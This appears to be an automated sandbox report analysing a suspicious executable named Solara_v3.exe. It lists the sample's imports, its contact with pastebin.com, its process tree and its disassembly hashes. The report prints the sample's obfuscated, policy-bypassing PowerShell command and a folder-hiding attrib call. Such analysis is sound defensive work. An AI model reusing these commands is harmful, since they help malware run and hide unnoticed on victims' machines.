InitializeCriticalSectionAndSpinCount
                                                                                                                                                  ADVAPI32.dllRegQueryValueExW, RegOpenKeyExW, SystemFunction036, RegCloseKey
                                                                                                                                                  dbghelp.dllSymInitialize, SymGetSearchPathW, SymSetSearchPathW, SymGetModuleBase64, SymFunctionTableAccess64, SymSetOptions, SymFromAddr, SymGetLineFromAddr64, StackWalk64
                                                                                                                                                  ole32.dllCoTaskMemFree
                                                                                                                                                  SHELL32.dllSHGetKnownFolderPath
                                                                                                                                                  WINMM.dlltimeGetTime

                                                                                                                                                  Exports

                                                                                                                                                  NameOrdinalAddress
                                                                                                                                                  CrashForExceptionInNonABICompliantCodeRange10x140bba0c0

                                                                                                                                                  Possible Origin

                                                                                                                                                  Language of compilation systemCountry where language is spokenMap
                                                                                                                                                  EnglishUnited States

                                                                                                                                                  Network Behavior

                                                                                                                                                  Network Port Distribution

                                                                                                                                                  TCP Packets

                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                  Jan 7, 2025 16:23:08.677045107 CET49736443192.168.2.4104.20.3.235
                                                                                                                                                  Jan 7, 2025 16:23:08.677088976 CET44349736104.20.3.235192.168.2.4
                                                                                                                                                  Jan 7, 2025 16:23:08.677205086 CET49736443192.168.2.4104.20.3.235
                                                                                                                                                  Jan 7, 2025 16:23:08.677403927 CET49736443192.168.2.4104.20.3.235
                                                                                                                                                  Jan 7, 2025 16:23:08.677418947 CET44349736104.20.3.235192.168.2.4
                                                                                                                                                  Jan 7, 2025 16:23:09.142539978 CET44349736104.20.3.235192.168.2.4
                                                                                                                                                  Jan 7, 2025 16:23:09.142995119 CET49736443192.168.2.4104.20.3.235
                                                                                                                                                  Jan 7, 2025 16:23:09.143017054 CET44349736104.20.3.235192.168.2.4
                                                                                                                                                  Jan 7, 2025 16:23:09.143100977 CET49736443192.168.2.4104.20.3.235
                                                                                                                                                  Jan 7, 2025 16:23:09.143107891 CET44349736104.20.3.235192.168.2.4
                                                                                                                                                  Jan 7, 2025 16:23:09.144603014 CET44349736104.20.3.235192.168.2.4
                                                                                                                                                  Jan 7, 2025 16:23:09.144679070 CET49736443192.168.2.4104.20.3.235
                                                                                                                                                  Jan 7, 2025 16:23:09.145119905 CET49736443192.168.2.4104.20.3.235
                                                                                                                                                  Jan 7, 2025 16:23:09.145119905 CET49736443192.168.2.4104.20.3.235
                                                                                                                                                  Jan 7, 2025 16:23:09.145442009 CET44349736104.20.3.235192.168.2.4
                                                                                                                                                  Jan 7, 2025 16:23:09.145512104 CET49736443192.168.2.4104.20.3.235

                                                                                                                                                  UDP Packets

                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                  Jan 7, 2025 16:23:08.653222084 CET6504153192.168.2.41.1.1.1
                                                                                                                                                  Jan 7, 2025 16:23:08.660634995 CET53650411.1.1.1192.168.2.4

                                                                                                                                                  DNS Queries

                                                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                  Jan 7, 2025 16:23:08.653222084 CET192.168.2.41.1.1.10x928aStandard query (0)pastebin.comA (IP address)IN (0x0001)false

                                                                                                                                                  DNS Answers

                                                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                  Jan 7, 2025 16:23:08.660634995 CET1.1.1.1192.168.2.40x928aNo error (0)pastebin.com104.20.3.235A (IP address)IN (0x0001)false
                                                                                                                                                  Jan 7, 2025 16:23:08.660634995 CET1.1.1.1192.168.2.40x928aNo error (0)pastebin.com104.20.4.235A (IP address)IN (0x0001)false
                                                                                                                                                  Jan 7, 2025 16:23:08.660634995 CET1.1.1.1192.168.2.40x928aNo error (0)pastebin.com172.67.19.24A (IP address)IN (0x0001)false

                                                                                                                                                  Statistics

                                                                                                                                                  CPU Usage

                                                                                                                                                  Click to jump to process

                                                                                                                                                  Memory Usage

                                                                                                                                                  Click to jump to process

                                                                                                                                                  High Level Behavior Distribution

                                                                                                                                                  Click to dive into process behavior distribution

                                                                                                                                                  Behavior

                                                                                                                                                  Click to jump to process

                                                                                                                                                  System Behavior

                                                                                                                                                  General

                                                                                                                                                  Target ID:0
                                                                                                                                                  Start time:10:23:00
                                                                                                                                                  Start date:07/01/2025
                                                                                                                                                  Path:C:\Users\user\Desktop\Solara_v3.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:"C:\Users\user\Desktop\Solara_v3.exe"
                                                                                                                                                  Imagebase:0x7ff6dcbc0000
                                                                                                                                                  File size:33'921'780 bytes
                                                                                                                                                  MD5 hash:404F9A9A90F2729D0ACBA7E76527FB88
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:Rust
                                                                                                                                                  Reputation:low
                                                                                                                                                  Has exited:true

                                                                                                                                                  General

                                                                                                                                                  Target ID:1
                                                                                                                                                  Start time:10:23:00
                                                                                                                                                  Start date:07/01/2025
                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:high
                                                                                                                                                  Has exited:true

                                                                                                                                                  General

                                                                                                                                                  Target ID:2
                                                                                                                                                  Start time:10:23:01
                                                                                                                                                  Start date:07/01/2025
                                                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:"powershell" -NoLogo -NonInteractive -NoProfile -ExecutionPolicy Bypass -EncodedCommand WwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACgAJwB7ACIAUwBjAHIAaQBwAHQAIgA6ACIAYQBXAFkAZwBLAEMAMQB1AGIAMwBRAGcASwBGAHQAVABlAFgATgAwAFoAVwAwAHUAVABXAEYAdQBZAFcAZABsAGIAVwBWAHUAZABDADUAQgBkAFgAUgB2AGIAVwBGADAAYQBXADkAdQBMAGwAQgBUAFYASABsAHcAWgBVADUAaABiAFcAVgBkAEoAMQBkAHAAYgBqAE0AeQBKAHkAawB1AFYASABsAHcAWgBTAGsAZwBlAHcAMABLAEkAQwBBAGcASQBFAEYAawBaAEMAMQBVAGUAWABCAGwASQBFAEEAaQBEAFEAbwBnAEkAQwBBAGcAZABYAE4AcABiAG0AYwBnAFUAMwBsAHoAZABHAFYAdABPAHcAMABLAEkAQwBBAGcASQBIAFYAegBhAFcANQBuAEkARgBOADUAYwAzAFIAbABiAFMANQBTAGQAVwA1ADAAYQBXADEAbABMAGsAbAB1AGQARwBWAHkAYgAzAEIAVABaAFgASgAyAGEAVwBOAGwAYwB6AHMATgBDAGcAMABLAEkAQwBBAGcASQBIAEIAMQBZAG0AeABwAFkAeQBCAGoAYgBHAEYAegBjAHkAQgBYAGEAVwA0AHoATQBpAEIANwBEAFEAbwBnAEkAQwBBAGcASQBDAEEAZwBJAEYAdABFAGIARwB4AEoAYgBYAEIAdgBjAG4AUQBvAEkAbgBWAHoAWgBYAEkAegBNAGkANQBrAGIARwB3AGkASwBWADAATgBDAGkAQQBnAEkAQwBBAGcASQBDAEEAZwBjAEgAVgBpAGIARwBsAGoASQBIAE4AMABZAFgAUgBwAFkAeQBCAGwAZQBIAFIAbABjAG0ANABnAFMAVwA1ADAAVQBIAFIAeQBJAEUAZABsAGQARQBaAHYAYwBtAFYAbgBjAG0AOQAxAGIAbQBSAFgAYQBXADUAawBiADMAYwBvAEsAVABzAE4AQwBnADAASwBJAEMAQQBnAEkAQwBBAGcASQBDAEIAYgBSAEcAeABzAFMAVwAxAHcAYgAzAEoAMABLAEMASgAxAGMAMgBWAHkATQB6AEkAdQBaAEcAeABzAEkAaQBsAGQARABRAG8AZwBJAEMAQQBnAEkAQwBBAGcASQBGAHQAeQBaAFgAUgAxAGMAbQA0ADYASQBFADEAaABjAG4ATgBvAFkAVwB4AEIAYwB5AGgAVgBiAG0AMQBoAGIAbQBGAG4AWgBXAFIAVQBlAFgAQgBsAEwAawBKAHYAYgAyAHcAcABYAFEAMABLAEkAQwBBAGcASQBDAEEAZwBJAEMAQgB3AGQAVwBKAHMAYQBXAE0AZwBjADMAUgBoAGQARwBsAGoASQBHAFYANABkAEcAVgB5AGIAaQBCAGkAYgAyADkAcwBJAEYATgBvAGIAMwBkAFgAYQBXADUAawBiADMAYwBvAFMAVwA1ADAAVQBIAFIAeQBJAEcAaABYAGIAbQBRAHMASQBHAGwAdQBkAEMAQgB1AFEAMgAxAGsAVQAyAGgAdgBkAHkAawA3AEQAUQBvAGcASQBDAEEAZwBmAFEAMABLAEkAawBBAE4AQwBuADAATgBDAG0AWgAxAGIAbQBOADAAYQBXADkAdQBJAEUAZABsAGQARQBGAGoAZABHAGwAMgBaAFYAZABwAGIAbQBSAHYAZAAxAFIAcABkAEcAeABsAEsAQwBrAGcAZQB3ADAASwBJAEMAQQBnAEkAQwBSAG8AVgAyADUAawBJAEQAMABnAFcAMQBkAHAAYgBqAE0AeQBYAFQAbwA2AFIAMgBWADAAUgBtADkAeQBaAFcAZAB5AGIAMwBWAHUAWgBGAGQAcABiAG0AUgB2AGQAeQBnAHAARABRAG8AZwBJAEMAQQBnAEoASABOAGkASQBEADAAZwBUAG0AVgAzAEwAVQA5AGkAYQBtAFYAagBkAEMAQgBUAGUAWABOADAAWgBXADAAdQBWAEcAVgA0AGQAQwA1AFQAZABIAEoAcABiAG0AZABDAGQAVwBsAHMAWgBHAFYAeQBLAEQASQAxAE4AaQBrAE4AQwBpAEEAZwBJAEMAQgBiAFYAMgBsAHUATQB6AEoAZABPAGoAcABIAFoAWABSAFgAYQBXADUAawBiADMAZABVAFoAWABoADAASwBDAFIAbwBWADIANQBrAEwAQwBBAGsAYwAyAEkAcwBJAEMAUgB6AFkAaQA1AEQAWQBYAEIAaABZADIAbAAwAGUAUwBrAGcAZgBDAEIAUABkAFgAUQB0AFQAbgBWAHMAYgBBADAASwBJAEMAQQBnAEkASABKAGwAZABIAFYAeQBiAGkAQQBrAGMAMgBJAHUAVgBHADkAVABkAEgASgBwAGIAbQBjAG8ASwBRADAASwBmAFEAMABLAFoAbgBWAHUAWQAzAFIAcABiADIANABnAFMARwBsAGsAWgBVAEYAagBkAEcAbAAyAFoAVgBkAHAAYgBtAFIAdgBkAHkAZwBwAEkASABzAE4AQwBpAEEAZwBJAEMAQQBrAGEARgBkAHUAWgBDAEEAOQBJAEYAdABYAGEAVwA0AHoATQBsADAANgBPAGsAZABsAGQARQBaAHYAYwBtAFYAbgBjAG0AOQAxAGIAbQBSAFgAYQBXADUAawBiADMAYwBvAEsAUQAwAEsASQBDAEEAZwBJAEYAdABYAGEAVwA0AHoATQBsADAANgBPAGwATgBvAGIAMwBkAFgAYQBXADUAawBiADMAYwBvAEoARwBoAFgAYgBtAFEAcwBJAEQAQQBwAEQAUQBwADkARABRAG8AawBZADMAVgB5AGMAbQBWAHUAZABGAGQAcABiAG0AUgB2AGQAMQBSAHAAZABHAHgAbABJAEQAMABnAFIAMgBWADAAUQBXAE4AMABhAFgAWgBsAFYAMgBsAHUAWgBHADkAMwBWAEcAbAAwAGIARwBVAE4AQwBrAGgAcABaAEcAVgBCAFkAMwBSAHAAZABtAFYAWABhAFcANQBrAGIAMwBjAE4AQwBnAD0APQAiAH0AJwAgAHwAIABDAG8AbgB2AGUAcgB0AEYAcgBvAG0ALQBKAHMAbwBuACkALgBTAGMAcgBpAHAAdAApACkAIAB8ACAAaQBlAHgA
                                                                                                                                                  Imagebase:0x7ff788560000
                                                                                                                                                  File size:452'608 bytes
                                                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:high
                                                                                                                                                  Has exited:true

                                                                                                                                                  General

                                                                                                                                                  Target ID:3
                                                                                                                                                  Start time:10:23:04
                                                                                                                                                  Start date:07/01/2025
                                                                                                                                                  Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\py0wfw3n\py0wfw3n.cmdline"
                                                                                                                                                  Imagebase:0x7ff621430000
                                                                                                                                                  File size:2'759'232 bytes
                                                                                                                                                  MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:moderate
                                                                                                                                                  Has exited:true

                                                                                                                                                  General

                                                                                                                                                  Target ID:4
                                                                                                                                                  Start time:10:23:04
                                                                                                                                                  Start date:07/01/2025
                                                                                                                                                  Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2A60.tmp" "c:\Users\user\AppData\Local\Temp\py0wfw3n\CSCB237945D4EF64F37AEB0937E3F152BA1.TMP"
                                                                                                                                                  Imagebase:0x7ff7f6150000
                                                                                                                                                  File size:52'744 bytes
                                                                                                                                                  MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:high
                                                                                                                                                  Has exited:true

                                                                                                                                                  General

                                                                                                                                                  Target ID:5
                                                                                                                                                  Start time:10:23:07
                                                                                                                                                  Start date:07/01/2025
                                                                                                                                                  Path:C:\Windows\System32\attrib.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:"attrib" +h C:\WindowsSystem
                                                                                                                                                  Imagebase:0x7ff786140000
                                                                                                                                                  File size:23'040 bytes
                                                                                                                                                  MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:moderate
                                                                                                                                                  Has exited:true

                                                                                                                                                  Disassembly

                                                                                                                                                  Reset < >

                                                                                                                                                    Execution Graph

                                                                                                                                                    Execution Coverage:2.5%
                                                                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                    Signature Coverage:0%
                                                                                                                                                    Total number of Nodes:3
                                                                                                                                                    Total number of Limit Nodes:0
                                                                                                                                                    execution_graph 6964 7ffd9b7eb124 6965 7ffd9b7eb12d LoadLibraryExW 6964->6965 6967 7ffd9b7eb1dd 6965->6967

                                                                                                                                                    Executed Functions

                                                                                                                                                    Function 00007FFD9B7EB124 Relevance: 1.6, APIs: 1, Instructions: 114libraryCOMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.1737280443.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ffd9b7e0000_powershell.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: LibraryLoad
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1029625771-0
                                                                                                                                                    • Opcode ID: bc303e92b5cc09753bdba098eb88123a8c52db46d6085fb5de4d41bce6a8e491
                                                                                                                                                    • Instruction ID: bbb3860104ddf59f75c84423d129b3cdf4231378164feb83d444ed8ed01d3aa7
                                                                                                                                                    • Opcode Fuzzy Hash: bc303e92b5cc09753bdba098eb88123a8c52db46d6085fb5de4d41bce6a8e491
                                                                                                                                                    • Instruction Fuzzy Hash: A331B03190CB4C8FDB19DBA89849BE9BBF0EF55321F04826BD059C3261DB74A855CB91
                                                                                                                                                    Function 00007FFD9B8B53B5 Relevance: .4, Instructions: 442COMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.1737746798.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ffd9b8b0000_powershell.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: b470efb948fa3da95a3990889f31d4d0c74e181f13dec5a083727f51033807af
                                                                                                                                                    • Instruction ID: b76c636d3ba5f80415af6653b063b4fff3641ec29b4850b9db6ae13fbc79a3cc
                                                                                                                                                    • Opcode Fuzzy Hash: b470efb948fa3da95a3990889f31d4d0c74e181f13dec5a083727f51033807af
                                                                                                                                                    • Instruction Fuzzy Hash: F2D13862A1FA9E0FE765DB7888755F97B91EF1A310B0900FED05DC70E3D918A905C781
                                                                                                                                                    Function 00007FFD9B8B2AAD Relevance: .3, Instructions: 286COMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.1737746798.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ffd9b8b0000_powershell.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 42767ec81c2d73bb8897f24dc1423be6fc138db209c39c25c844e1503ab37bee
                                                                                                                                                    • Instruction ID: 80470288715e2d840b8859a17261f632377ee355a10e7c4ea2cb59513cd5ed1b
                                                                                                                                                    • Opcode Fuzzy Hash: 42767ec81c2d73bb8897f24dc1423be6fc138db209c39c25c844e1503ab37bee
                                                                                                                                                    • Instruction Fuzzy Hash: 5D812822B0E7C90FE36A5BB858361A47FD1DF5A260B0901FFD089CB1E7DD4D68068742

                                                                                                                                                    Non-executed Functions

                                                                                                                                                    Function 00007FFD9B7ED77C Relevance: 2.0, Strings: 1, Instructions: 753COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.1737280443.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ffd9b7e0000_powershell.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: L
                                                                                                                                                    • API String ID: 0-2909332022
                                                                                                                                                    • Opcode ID: f9a7ba4be07a5940c02f0e00a66c8e67b293aac892e3186242e5bd8877e32521
                                                                                                                                                    • Instruction ID: 066172f7985e5a55d8506612813e5cbae1335266908f7d90d98902538381954c
                                                                                                                                                    • Opcode Fuzzy Hash: f9a7ba4be07a5940c02f0e00a66c8e67b293aac892e3186242e5bd8877e32521
                                                                                                                                                    • Instruction Fuzzy Hash: 5642C330A1DB8D4FEB74DF588865BA877E0FF55300F0542B9D84DCB2B2DA74AA468781
                                                                                                                                                    Function 00007FFD9B7ED805 Relevance: 1.8, Strings: 1, Instructions: 593COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.1737280443.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ffd9b7e0000_powershell.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: L
                                                                                                                                                    • API String ID: 0-2909332022
                                                                                                                                                    • Opcode ID: 156bd7128c3ef944d81c0650e39f5f224e9ded3bed0a1032511b8dc5aa190d75
                                                                                                                                                    • Instruction ID: 89243ad56e1de6da40381b62d861ae2ea706adec8d78efd8f7c01e85b034883b
                                                                                                                                                    • Opcode Fuzzy Hash: 156bd7128c3ef944d81c0650e39f5f224e9ded3bed0a1032511b8dc5aa190d75
                                                                                                                                                    • Instruction Fuzzy Hash: 6A128F70A19B4E4FEBB8DF588865BA977E0FF58300F054279D84EC72B1DE34AA458781
                                                                                                                                                    Function 00007FFD9B7E3FFA Relevance: .5, Instructions: 457COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.1737280443.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ffd9b7e0000_powershell.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 2e81aab597d30e5ea065f4ddfcd3e30b97d1f13d3780a94accf349bd42e0c130
                                                                                                                                                    • Instruction ID: 1b33ece6c69d3ca0e6e2af9723740a1dcb62a05b7a8a493527a1ab00d43bec6e
                                                                                                                                                    • Opcode Fuzzy Hash: 2e81aab597d30e5ea065f4ddfcd3e30b97d1f13d3780a94accf349bd42e0c130
                                                                                                                                                    • Instruction Fuzzy Hash: BDC1E931B1DA0D4FEB68EB6D98656B937D2FFC8710F45017EE44DC32A6DE24A9028385